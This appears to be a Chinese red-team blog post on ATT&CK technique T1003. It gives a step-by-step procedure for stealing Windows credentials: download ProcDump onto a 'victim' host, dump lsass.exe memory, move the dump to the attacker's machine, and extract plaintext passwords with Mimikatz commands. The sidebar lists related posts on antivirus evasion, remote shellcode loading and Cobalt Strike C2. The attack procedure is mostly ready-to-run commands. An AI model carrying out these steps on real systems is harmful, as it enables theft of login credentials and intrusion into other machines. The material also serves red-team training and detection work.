ATT&CK技术-T1003-Credential Dumping
Mimikatz     ProcDump     抓取密码     Credential Dumping     T1003    

ATT&CK技术-T1003-Credential Dumping

363 次访问
leader
Scroll Down

Credential Dumping 凭证转储

Details

ProcDump and Mimikatz

  • 下载 ProcDump 工具到需要抓取密码的那台主机上:

可以使用 Powershell来下载,或者bitsadmin还有Certutil

powershell Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile %ALLUSERSPROFILE%\Procdump.zip
  • 解压 Procdump.zip 在受害者机器上
  • 在受害者主机上转储lsass.exe的进程内存(使用克隆转储):
%ALLUSERSPROFILE%\procdump.exe -accepteula -ma lsass.exe lsass.dmp -r
  • lsass.dmp 文件下载到攻击者本地
  • 使用 Mimikatz (x64/mimikatz.exe) 以获取明文密码:
    • Run Mimikatz
    • 输入 sekurlsa::Minidump lsass.dmp
    • 输入 sekurlsa::logonPasswords

References

© 本文著作权归作者所有,转载前请务必署名

最新文章
T1003-win-明文-Procdump凭证转储.md

T1003-windows-Procdump明文凭证来自ATT&CK的描述凭证获取是从操作系统和软件中获取登录信息和密码的过程,通常为HASH散列或明文密码。然后使用凭证进行横向移动访问其他系统。用户登录系统后,会生成各种凭据并将其存储在内存中的本地安全机构子系统服务(LSASS)进程中。这
[转]使用mimikatz导出chrome密码

使用mimikatz导出chrome密码因为在拿到一台用户PC或者内网装有Chrome的服务器时,需要导出Chrome浏览器的密码。虽然市面上有很多软件可以使用,但是我发现,他们都是去默认路径下读取,如果用户将Chrome的Data数据保存在其他盘中的时候,并不能解密导出成功。所以就记录下如何使用m
CS合法证书+ps上线手把手示范

参考文档:CS合法证书+Powershell上线https://bluescreenofjeff.com/2018-04-12-https-payload-and-c2-redirectors/首先,请宁打开您的购买域名的网站。添加a记录。然后,我要去freessl网站申请我买的dtgsiam.pw
免杀系列——远程获取shellcode

大致思路:https://mp.weixin.qq.com/s/Zs_fCqZfzdzHTwVPvshFyQ他的思路跟我之前的想法差不多,但是我觉得还可以再花里胡哨一点,哈哈哈。我使用Golang(客户端)+Python和flask(服务端)来搭建这套免杀系统。主要原理:服务端关键代码:AES加密s
Fastjson漏洞学习(1)

漏洞复现今天去绿盟那边面试,问了个关于fastjson的问题。没怎么回答上来,主要是都没怎么在实战中用到,不是很熟悉这个。问:Fastjson在遇到不出外网的情况下,如何利用。复现环境Vulhub的docker环境Fastjson1.2.24如何判断使用了Fastjson报错回显一般我是传递一个不完
分类
工具 1593115068035
小技巧 1590506915066
漏洞复现 vulnhub
杂记 1578377560604
权限维持 1577677481988
Bypass bypass
ATT&CK attck
红蓝对抗 redteam
标签
导出lsass 导出lsass
DumpPassword dumppassword
Chrome浏览器密码导出 chrome浏览器密码导出
Decrypt-pass decrypt-pass
Decrypt-Chrome-pass decrypt-chrome-pass
Chrome chrome
Shellcode shellcode
免杀 免杀
cobaltstrike远控 cobaltstrike远控
CS cs
cobaltstrike cobaltstrike
反序列化漏洞 反序列化漏洞
Fastjson反序列化漏洞 fastjson反序列化漏洞
Fastjson fastjson
frp代理钉钉通知 frp代理钉钉通知
frp代理软件 frp代理软件
frp frp
无文件 无文件
回显 回显
Shiro反序列化 shiro反序列化
Shiro shiro
微信解密 1593115099474
微信聊天记录解密 1593115099470
命令执行 1590506843774
Tips tips
无回显 1590506843757
CNVD-2020-10487 cnvd-2020-10487
Tomcat幽灵猫 tomcat
CVE-2020-1938 cve-2020-1938
实战 1588140261114
通达OA oa
CVE-2020-2555 cve-2020-2555
漏洞复现 1587026226930
CVE-2020-2551 cve-2020-2551
Weblogic weblogic
2019 2019
总结 1578377564263
记录SSH密码 ssh
权限维持 1577677497553
Linux linux
红队 1577245982632
T1003 t1003
Credential Dumping credential-dumping
抓取密码 1577242318501
Mimikatz mimikatz
ProcDump procdump
Simple-Loader simple-loader
T1223 t1223
CHM chm
绕过windows defender windows-defender
att&ck attck
MSbuild msbuild
远控上线 1576224996894
过360 360
反弹shell shell
PowerShell powershell
BypassAV bypassav
PowerLine powerline